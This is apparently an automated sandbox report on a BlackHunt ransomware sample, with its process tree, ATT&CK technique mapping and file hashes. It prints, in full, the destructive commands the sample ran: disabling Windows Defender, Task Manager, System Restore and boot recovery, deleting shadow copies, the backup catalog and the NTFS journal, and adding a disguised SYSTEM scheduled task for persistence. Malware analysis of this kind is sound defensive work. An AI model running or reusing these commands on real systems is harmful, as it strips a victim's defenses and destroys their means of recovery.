C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:4820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:5100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3180
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1588
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3100
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4840
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4188
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:5068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a96d2fa41615eb8abfe20122bfe9faff36430af92d1efd5faf9af141d010f23c.exe" /F3⤵
- Creates scheduled task(s)
PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2944
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1512
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2704
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:792
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1240
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:1496
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3408
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2220
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2432
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1544
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵
- Adds Run key to start application
PID:4820 -
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1320
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5908
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5212
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:5256
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f4a344a39e5b4ab4c83ec6e6ff944ca9
SHA1f9413c70c1e7289e8d9524ad17e0609b917bcc45
SHA256361b37590d04ee0256f1cbd98ff4d434395c3e3143b14b44e9583941b1f6de6d
SHA5123d37a50c8c588cede46b44b99e21954be69744870f8b3d193f204fbd6de2c134ae13da362d9bc3671511a0d8a53d2b901ee869414c1ad5ec616ee84e54b57fdf
-
Filesize
12KB
MD5b6e8bbb140b17e0cc8fc6d599559d25f
SHA1f3413f4abe6296e86a780e64b738a5384d92e5c0
SHA2564211554ef754a91eec22475b28fad23a00a9f8dab787406032ce0abe2faa59cc
SHA51200bf25c29224adf1fb6c160ac712bc7a5318402bf04f7651d4b5f186b6fe9a149daaa0239b19839794b712471e8728dc9d5fc8cd8a8229659864d861fddfd3ef
-
Filesize
684B
MD57282956a272b1d3c10929f0ad7a8f3ce
SHA1b4816e43212cba605f205563c09815d57db3b38b
SHA256a042465873211e1005804e90a093f46eb518db0285aa28d27bc7ac17864f9a1f
SHA512de2f7ce23884aef85c0026e0fa29c00962b31367384e824596689ef3f29bcc2507354ccb09f6e117141cffec029df2b28c7dc44f1f662a879eb9a17561aa4ea4